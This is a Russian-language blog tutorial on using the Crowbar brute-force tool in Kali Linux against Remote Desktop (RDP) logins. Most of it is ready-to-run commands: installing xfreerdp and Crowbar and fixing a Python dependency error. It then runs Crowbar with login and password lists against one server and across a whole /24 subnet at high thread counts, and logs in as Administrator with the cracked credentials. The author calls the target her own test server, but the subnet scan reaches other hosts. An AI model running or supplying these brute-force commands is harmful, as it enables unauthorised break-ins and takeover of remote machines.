Обзор скрипта для брутфорса Crowbar в KaliLinux.

Обзор скрипта для брутфорса Crowbar в KaliLinux.

@vlmisuu

Встречайте, Его Величество Crowbar. 


Первоначально у меня было намерение установить скрипт на удалённую машину под управлением CentOS 7. Но меня ожидала неудача. Дело в том, что я планировала проверить работу скрипта по протоколу RDP и никакие компромиссы меня не устраивали. При работе по протоколу удалённого рабочего стола работа скрипта тесно связана с утилитой xfreerdp. 


Я подключалась к VDS как обычно по протоколу SSH - в этом заключалась моя вероятная ошибка. 


Для успешного контакта Crowbar+ XfreeRDP на удалённой машине необходимо было подключиться по VNC либо RDP. 


Но внезапно нахлынувший ночной энтузиазм таял от минуты к минуте и было принято решение сдуть пыль с ярлыка "VMware Workstation Pro" на рабочем столе локальной машины. 


На установку скачанного десять месяцев назад образа KaliLinux не ушло много времени. 


По-быстрому произведены первичные настройки виртуального Kali и настал момент "танцев с бубном" вокруг Crowbar 


Брут Crowbar - это скрипт на питоне , который вызывает системные программы с нужными параметрами . Для брута rdp вызывается xfreerdp клиент 


# apt-get install freerdp-x11 






Проверка работоспособности xfreerdp 


# xfreerdp —version 

# xfreerdp —sec nla 185.154.13.84 





Вышеуказанные команды вызывают адекватную реакцию, никаких ошибок в отличие от работы на удалённой CentOS 7 не выдали, значит можно продолжить. 


Клонируем скрипт Crowbar при помощи git: 


# git clone https://github.com/galkan/crowbar 





Заходим в папку со скриптом: 


# cd crowbar 





Файлу надо добавить бит исполнимости (возможно, эта команда - лишняя, но я решила подстраховаться): 


# chmod +x crowbar.py 





Проверим работоспособность скрипта на этом этапе. Зададим ему команду выдать справку о себе. 


# python crowbar.py —help 






Перед моим взором на экране монитора появилась страница справки по программе. 


В этом месте возможно появление следующей ошибки: 


No module named pkg_resources 


Решение проблемы с ошибкой No module named pkg_resources 


# yum -y update 

# yum -y install python-pip 

# pip install —upgrade pip 





Или 


# pip install —upgrade setuptools 

# pip install —upgrade distribute 





Опять пробуем запустить "Хелп" 


# python crowbar.py —help 





Работает )) 


На этом - ВСЁ. 


Всё коротко и лаконично ) 


Создаём текстовые файлы с предполагаемым списком логинов, 


а также со списком предполагаемых паролей. 


Запуск скрипта питон в скрипте баш 


Атаковать будем мой тестовый дедик IP 185.1хх.13.хх 


Команда для атаки в моём случае должна иметь следующий вид: 


# python crowbar.py -b rdp -U login.txt -C pass.txt -s IP 185.1хх.13.хх/32 -o good.txt -n 100 -t 500 -v -d 





Сканирование подсети 185.1хх.13.хх/24 


# python crowbar.py -b rdp -U login.txt -C pass.txt -s 185.1хх.13.хх/24 -o good.txt -n 100 -t 500 -v -d 





Короткие пояснения : 


-b rdp - Целевая служба. Crowbar поддерживает vnckey, openvpn, sshkey, rdp. 


-n 100 - Количество задействованных потоков 


-S: </path/to/file> список IP для брута 


-d: Запустить nmap для того, чтобы узнать, является ли порт открытым или нет. 


-v: Подробный режим, который показывает все попытки, включая неудачу. 


-o good.txt -Все логи включая положительные результаты записываются в файл good.txt 


После окончания атаки просматриваем файл good.txt и обнаруживает, что тестовый дедик успешно сбручен. 


Подключаемся к его удалённому рабочему столу. 


# xfreerdp -k en-us -a 32 -x l -z -u Administrator -g 800x600 —sec rdp —plugin cliprdr 185.1хх.13.хх 


На этом у меня всё.